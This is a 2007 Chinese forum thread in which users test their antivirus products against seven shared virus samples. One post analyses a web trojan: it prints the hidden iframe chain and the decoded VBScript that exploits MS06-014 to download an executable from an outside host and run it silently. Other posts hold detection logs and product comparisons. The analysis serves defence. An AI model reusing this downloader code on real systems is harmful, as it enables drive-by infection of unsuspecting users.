7个样本，看看你的杀软杀几个，是最近流行病毒

dikex

原帖由 iGod 于 2007-1-19 14:32 发表
江民KV2006报了六个，那个英豪学校的网页木马没报

那个英豪的其实并没有直接的有害代码，只是在它的代码最后面镶嵌了一个网页

1. <iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0" frameborder="0"></iframe>

复制代码

而这个http://www.ac66.cn/88/index.htm里面又镶嵌了一个网页

1. <iframe src="http://www.ac66.cn/88/joke.htm" width="0" height="0" frameborder="0"></iframe>

复制代码

这个http://www.ac66.cn/88/joke.htm才是真正的存在有害代码的网页，卡巴报为Trojan-Downloader.VBS.Agent.b，经过ASCII码转换后核心的代码是下面的这个：

1.     on error resume next
   
2.     dl = "http://www.ac66.cn/88/buding.exe"
   
3.     Set df = document.createElement("object")
   
4.     df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
   
5.     str="Microsoft.XMLHTTP"
   
6.     Set x = df.CreateObject(str,"")
   
7.     a1="Ado"
   
8.     a2="db."
   
9.     a3="Str"
   
10.     a4="eam"
    
11.     str1=a1&a2&a3&a4
    
12.     str5=str1
    
13.     set S = df.createobject(str5,"")
    
14.     S.type = 1
    
15.     str6="GET"
    
16.     x.Open str6, dl, False
    
17.     x.Send
    
18.     fname1="g0ld.com"
    
19.     set F = df.createobject("Scripting.FileSystemObject","")
    
20.     set tmp = F.GetSpecialFolder(2)
    
21.     fname1= F.BuildPath(tmp,fname1)
    
22.     S.open
    
23.     S.write x.responseBody
    
24.     S.savetofile fname1,2
    
25.     S.close
    
26.     set Q = df.createobject("Shell.Application","")
    
27.     Q.ShellExecute fname1,"","","open",0

复制代码

看到了clsid:BD96C556-65A3-11D0-983A-00C04FC29E36这个，不用继续对上面的代码作出处理就知道她是利用MS06014漏洞的网马了，而它想要进行非法下载的就是http://www.ac66.cn/88/buding.exe这个文件，卡巴报为Trojan-Downloader.Win32.Delf.asb

[ 本帖最后由 dikex 于 2007-1-19 16:26 编辑 ]

hzp

毒霸也是六个,看来毒霸还是不是想象中的那么垃圾!

绅博周幸

Win32:Tibs-ADO－－－－－－AVAST直接不让下载

yuezheng710

nod32查了6个，其中soundmix没查出来

wao1201

OK  F-Secure全部搞定

寂寞の夜

咖啡查到四个。
不过剩下的三个都运行了一下，结果是这样的
2007-1-19        22:56:59        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\soundmix\soundmix.exe        C:\WINDOWS\system32\PSAPI.DLL        用户定义的规则:A86 超级防护规则（警告！慎用此规则！）
        
2007-1-19        22:57:06        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\IMM32.DLL        用户定义的规则:A86 超级防护规则（警告！慎用此规则！）         

2007-1-19        22:57:06        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\LPK.DLL        用户定义的规则:A86 超级防护规则（警告！慎用此规则！）         

2007-1-19        22:57:06        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\F969CAFC.EXE        通用最大保护:禁止在 Windows 文件夹中创建新的可执行文件     
   
2007-1-19        22:57:07        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\F969CAFCT.EXE        通用最大保护:禁止在 Windows 文件夹中创建新的可执行文件         
2007-1-19        22:57:07        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\delme.bat        防病毒爆发控制:将所有共享项设为只读         
2007-1-19        22:57:08        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\IMM32.DLL        用户定义的规则:A86 超级防护规则（警告！慎用此规则！）         
2007-1-19        22:57:08        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\LPK.DLL        用户定义的规则:A86 超级防护规则（警告！慎用此规则！）         
2007-1-19        22:57:08        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\F969CAFC.EXE        通用最大保护:禁止在 Windows 文件夹中创建新的可执行文件         
2007-1-19        22:57:08        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\F969CAFCT.EXE        通用最大保护:禁止在 Windows 文件夹中创建新的可执行文件         
2007-1-19        22:57:08        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\delme.bat        防病毒爆发控制:将所有共享项设为只读         
2007-1-19        22:57:12        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\威金变种\GameSetup.exe        C:\WINDOWS\system32\WSOCK32.DLL        用户定义的规则:A86 超级防护规则（警告！慎用此规则！）

[ 本帖最后由 寂寞の夜 于 2007-1-19 22:56 编辑 ]

bleach

DRWEB7个全杀

pchhh

大蜘蛛全杀！

Kakura

下都下不下来~~~

lcg391

蜘蛛通杀啊！
支持蜘蛛啊！